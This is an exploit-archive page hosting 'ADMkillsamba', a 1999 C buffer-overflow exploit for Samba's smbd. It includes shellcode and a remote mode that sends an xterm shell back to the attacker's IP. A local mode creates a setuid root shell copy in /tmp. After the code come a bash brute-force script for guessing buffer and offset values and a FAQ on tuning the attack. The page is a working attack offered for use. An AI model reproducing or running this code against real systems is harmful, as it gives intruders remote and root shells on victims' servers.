exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ADMultimateSMBsploit

ADMultimateSMBsploit
Posted Sep 23, 1999

ADMultimateSMBsploit

SHA-256 | 92fe9ece9ee952039f23cb9b7dfce17aeaef6bbddf09c009b54fa2b0997b8e62

ADMultimateSMBsploit

Change Mirror Download
/*                    ___      ______      _       _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''

ADMkillsamba ver 0.2 argh ADM back again ! :)))
whats new ?: i have include a krad help & a verry Fast utility for found
smbserver <note: u can use it for found imapd :)> ; a script shell for make
brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */



/* ADMkillsamba-v0.2.c */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";


void main(int argc, char *argv[]) {
FILE *filez;
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];
char bufferz[255];
char ipz[40];
char myipz[40];
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
int *ret;
unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
unsigned char arg1[50];
int i;

bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);

if(argc <3){
printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
printf(" HaVe Fun\n");
exit(0);
}

if(*(argv[1]+0)=='R'){
printf("Remote sploit\n");
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) offset = atoi(argv[6]);
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[3]);
}

if(*(argv[1]+0)=='L'){
printf("Local sploit\n");
strcpy(shellcode,localshell);
strcpy(netbios_name,argv[2]);
strcpy(ipz,"127.0.0.1");
filez=fopen("/tmp/IK","w+");
fprintf(filez,"#!/bin/sh\n");
fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
fflush(filez);
fclose(filez);
system("chmod a+x /tmp/IK");
}


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);


addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);


}


--------------------------------small help------------------------------------

ADMsmb HELP v0.1

( a krad help =) )

Q: why the sploit gimme alwais the msg Broken pipe ???
A: ok diz msg appear when you have not the good buffer_size/offset value
yes diz param change on every machine ! u must found it! for that try
a brutal force on the buff/offset see the script :)


-------------------------------Brutal Force-----------------------------------
#!/bin/sh
declare -i D
declare -i OFF
declare -i try
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------



Q: what is the best param for buff/offst .?
A: first try with diz param buffer=3081 offset=3500 if is dont work try
to change the offset size 1000 at 8000 if he dont run try buff size 3075
at 3090 i know its hard but with experience its simple =)

Q: how to found the buff size ??
A: simple ! launch ADMkillsamba with buff/size=1000 if the srv dont make
a broken pipe the buffer was to small try by step of 100 when the srv
give u a broken pipe ; try to see the precise value ! and make a scan on
it =)

ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100


Q: the offset size ??
A: Scan it :)


PS: if u found a offset & buff/size on a system plz send it i'am gonna make
a list of the most curently buff/size

PPS: if u wanna code a char shell for a other OS mail me !

news: ADM gonna make a home page for diz sploit dont forget to see it for
more helps tips/etc

cya

--------------------------------------------------------------------------------
U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close